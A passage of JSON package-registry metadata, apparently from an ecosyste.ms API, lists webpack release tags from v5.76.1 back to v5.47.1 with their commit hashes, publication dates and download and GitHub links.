ommit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"